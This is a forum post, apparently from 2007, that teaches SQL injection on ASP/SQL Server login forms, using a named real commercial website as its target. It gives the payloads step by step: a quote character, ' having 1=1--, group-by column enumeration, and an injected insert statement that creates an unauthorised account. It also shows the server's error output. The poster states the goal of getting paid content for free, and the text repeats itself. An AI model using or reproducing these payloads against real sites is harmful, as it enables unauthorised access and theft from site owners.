nova
BANNED
- Jul 23, 2007
- 243
- 155
OK boys and girls. Here is how you can hack some sites using a method called SQL injection.
Now as you all know, sites use databases to store their users information. SQL Server from microsoft is one of the popular databases and 99% of the times the sites using this database are coded in a language called ASP.
The pages on such a site end with the extension .asp
The first test we need to do is to find a form on such a site say for example a login form. Now our objective is to create an account on such a site.
Ill take a case study. Just today I got an email from a internet marketer promoting this.
I mailed him about this vulnerability but he hasn't responded, so I guess hes not bothered about this.. oh well...
http://www.adsalternative.com/index.asp
So we go to the members login page
http://www.adsalternative.com/members/login.asp
BIG mistake letting people know the login page to the members area.
Now we enter the
character in the username field. We get this message.
"Please ensure that you enter both your Username and your Password in order to log in to the members' area"
Which means that hes validating both the username and password.
So lets enter ' in both the fields and press login
Which returns this error
Which means that his asp script isnt checking for the ' character and this is the basis of this expliot.
Now we type
' having 1=1-- into the user name and ' into the password and press login
Which returns us this error
So now we know that his table name is members and his first column is id.
Now we use a "group by" SQL clause to find out the other column names
so we type the user name as ' group by users.id having 1=1--
and ' as the password and press login
which returns the error
so we know his next column is emailAddress.
Continuing in this manner, grouping by each column name, we get his whole table structure
Once we have that all we need to do is insert a record with our name.
So in the username field we enter
and in the password field we enter
and press login
This has created us an account with the username jack and the password hack.
Now we can login with this username and password and download all his shite for free
Another example of poor site protection :nutkick:
So mods does this qualify for the VIP access
Now as you all know, sites use databases to store their users information. SQL Server from microsoft is one of the popular databases and 99% of the times the sites using this database are coded in a language called ASP.
The pages on such a site end with the extension .asp
The first test we need to do is to find a form on such a site say for example a login form. Now our objective is to create an account on such a site.
Ill take a case study. Just today I got an email from a internet marketer promoting this.
I mailed him about this vulnerability but he hasn't responded, so I guess hes not bothered about this.. oh well...
http://www.adsalternative.com/index.asp
So we go to the members login page
http://www.adsalternative.com/members/login.asp
BIG mistake letting people know the login page to the members area.
Now we enter the
Code:
'"Please ensure that you enter both your Username and your Password in order to log in to the members' area"
Which means that hes validating both the username and password.
So lets enter ' in both the fields and press login
Which returns this error
Code:
"Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near 'ds'.
/includes/databaseconnect.asp, line 21 "Which means that his asp script isnt checking for the ' character and this is the basis of this expliot.
Now we type
' having 1=1-- into the user name and ' into the password and press login
Which returns us this error
Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'members.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/includes/databaseconnect.asp, line 21So now we know that his table name is members and his first column is id.
Now we use a "group by" SQL clause to find out the other column names
so we type the user name as ' group by users.id having 1=1--
and ' as the password and press login
which returns the error
Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'members.emailAddress' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/includes/databaseconnect.asp, line 21so we know his next column is emailAddress.
Continuing in this manner, grouping by each column name, we get his whole table structure
Once we have that all we need to do is insert a record with our name.
So in the username field we enter
Code:
'; insert into members(username,password) values('jack', 'hack')--and in the password field we enter
Code:
'and press login
This has created us an account with the username jack and the password hack.
Now we can login with this username and password and download all his shite for free
Another example of poor site protection :nutkick:
So mods does this qualify for the VIP access
http://tubeautomator.com/squeeze.php
'
